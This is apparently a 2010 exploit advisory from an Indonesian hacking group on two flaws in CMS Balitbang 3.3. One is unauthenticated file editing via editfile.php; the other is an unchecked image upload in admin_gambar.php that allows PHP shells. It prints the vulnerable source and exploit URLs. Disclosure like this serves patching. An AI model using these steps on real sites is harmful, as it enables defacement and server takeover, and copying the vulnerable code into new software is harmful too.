balitbang cms 3.3 - Multiple Vulnerabilities

                                                [!]===========================================================================[!]

 [~] CMS Balitbang Edit File Vulnerability
 [~] Author : Xr0b0t ([email protected])
 [~] Homepage : www.indonesiancoder.com | xrobot.mobi | mc-crew.net | exploit-id.com
 [~] Date : 18 Mart, 2010
 [~] Tested on : BlackBuntu RC2

 [!]===========================================================================[!]

 [ Software Information ]

 [+] Vendor : kajianwebsite.org
 [+] Download : http://www.kajianwebsite.org/download/CMS%20versi%203.3.zip
 [+] Price : free
 [+] Vulnerability : Local File Editing
 [+] Dork : Xr0b0t Was Here ;)
 [+] Version : version 3.3

 [!]===========================================================================[!]

 [ Default Site ]
 http://127.0.0.1/



 [ XpL ]

 http://127.0.0.1/litbang//functions/editfile.php

 [code]
 <?php
 if ($save=='simpan') {
 $dwrite = fopen("../modul/tag_".$file.".php", "w");
 $nfile = stripslashes($nfile);
 fputs ($dwrite, $nfile);
 fclose ($dwrite);
 echo "File sudah disimpan....Silahkan tutup jendela ini";
 //header("Location: ../admin/admin.php?mode=konf&kd=berhasil");
 }
 else {
 $dread = file("../modul/tag_".$file.".php");
 for ($i=0; $i <= count($dread); $i++) {
 $output .= $dread[$i];
 }
 echo "<form action='editfile.php' method=post>File Name : <input type=text name=nmfile value='tag_".$file.".php'> Jarngan diganti<br><textarea name=nfile cols=80 rows=20>$output</textarea><br><input type=hidden name=file value='$file' >
 <input type=submit value='Simpan' ><input type=hidden name='save' value='simpan' ></form>";

 }
 ?>




 [ Result In ]

 http://127.0.0.1/litbang//modul/tag_.php

 [ Demo ]

 exploit : http://127.0.0.1/litbang/functions/editfile.php

 Result : http://127.0.0.1/litbang/modul/tag_.php




 etc etc etc ;]

 [!]===========================================================================[!]

 [!]===========================================================================[!]

[~] CMS Balitbang admin_gambar v3.3 File upload vulnerabilities
[~] Author : Xr0b0t ([email protected])
[~] Descovery By : k4l0ng666 a.k.a Hijack_Edan Ganteng sekali Tapi Tetep Gantengan saya
[~] Homepage : http://www.indonesiancoder.com | http://xrobot.mobi | http://mc-crew.net
[~] Date : 19 Mart, 2010
[~] Tested on : BlackBuntu RC2

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://www.balitbang.depdiknas.go.id/
[+] Download : http://www.kajianwebsite.org/download/CMS%20versi%203.3.zip
[+] Price : free
[+] Vulnerability : LFD
[+] Dork : Xr0b0t Was Here ;)
[+] Version : CMS V3.3
[+] Advisories : http://exploit-id.com/web-applications/cms-balitbang-admin_gambar-v3-3-file-upload-vulnerabilities
[+] Original Post : http://blog.xrobot.mobi/x86/cms-balitbang-admin_gambar-v3-3-file-upload-vulnerabilities


[!]===========================================================================[!]

[ Vulnerable Source Code: ]

[code]
<html>
<head>
<title>Insert Gambar</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body topmargin='0' leftmargin='0' rightmargin='0' marginwidth='0' marginheight='0' bgcolor="#ddecca">
<script language='javascript'>
function add_gambar(code) {
opener.document.RTEDemo.data.value +=code;
//oRTE.document.execCommand('InsertImage', false, code);
}
</script>
<?php if ($save=='') { ?>
<table width="98%" border="1" cellspacing="0" cellpadding="0">
<tr><form action="admin_gambar.php?save=1" enctype="multipart/form-data" method="post">
<td>Gambar : <input type="file" name="myimage" >    <input type="submit" value="Upload"></td></form>
</tr>
<tr>
<td>Masukkan Gambar dengan format Gif atau Jpg, tidak lebih dari 200 Kb</td>
</tr>
</table>
<?php }
else {
if(!empty($myimage_name))
{
$limitedext = array(".gif",".jpg");
$size_bytes =204800; //51200 bytes = 50KB.
$ext = strrchr($myimage_name,'.');
$ero='';
if (!in_array(strtolower($ext),$limitedext)) {
$ero .="Gambar tidak sesuai harus format GIF atau JPG"; }
if ($myimage_size > $size_bytes){
$ero .="File terlalu besar, tidak boleh lebih dari 200 Kb"; }

if ($ero=='') {
if(file_exists("../images/misc/".$myimage_name))
{ unlink("../images/misc/".$myimage_name); }

copy($myimage,"../images/misc/".$myimage_name);
$d="../images/misc/".$myimage_name;
?>
<table width="98%" border="1" cellspacing="0" cellpadding="0">
<tr><td><img src="<?php echo $d?>" width="200" height="100"></td><td>Kemudian Drag Gambar disamping ini menggunakan Mouse
Pindahkan ke Layout Text Data."
</td></tr>
</table>
<?php
}
else echo $ero.",<a href='admin_gambar.php'>Kembali</a>";
}
else echo "Gambar tidak ada,<a href='admin_gambar.php'>Kembali</a>";
}
?>
</body>
</html>

[/code]


[ Default Site ]
http://127.0.0.1/



[ XpL ]

http://127.0.0.1/webtemp/functions/admin_gambar.php




[ Result In ]

http://127.0.0.1/webtemp/images/misc/"file name"




with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked

Goo The IndonesianCoder!!!

[!]===========================================================================[!]

[ Thx TO ]

[+] Don Tukulesto DUDUl Kok G rene2...
[+] kaMtiEz Love Ayyunda Kalo Ane Xr0b0t Love Septyy !!
[+] INDONESIAN CODER TEAM IndonesianHacker Malang CYber CREW Magelang Cyber
[+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,Yur4kha,Geni212,k4l0ng666,dr-Cruzz



[ NOTE ]

[+] OJOK JOTOS2an YO ..
[+] Minggir semua Arumbia Team Mau LEwat ;)
[+] MBEM : lup u :">

[ QUOTE ]

[+] INDONESIANCODER still r0x...
[+] ARUmBIA TEam Was Here Cuy MINGIR Kabeh KAte lewat ..
[+] Malang Cyber Crew & Magelang Cyber Community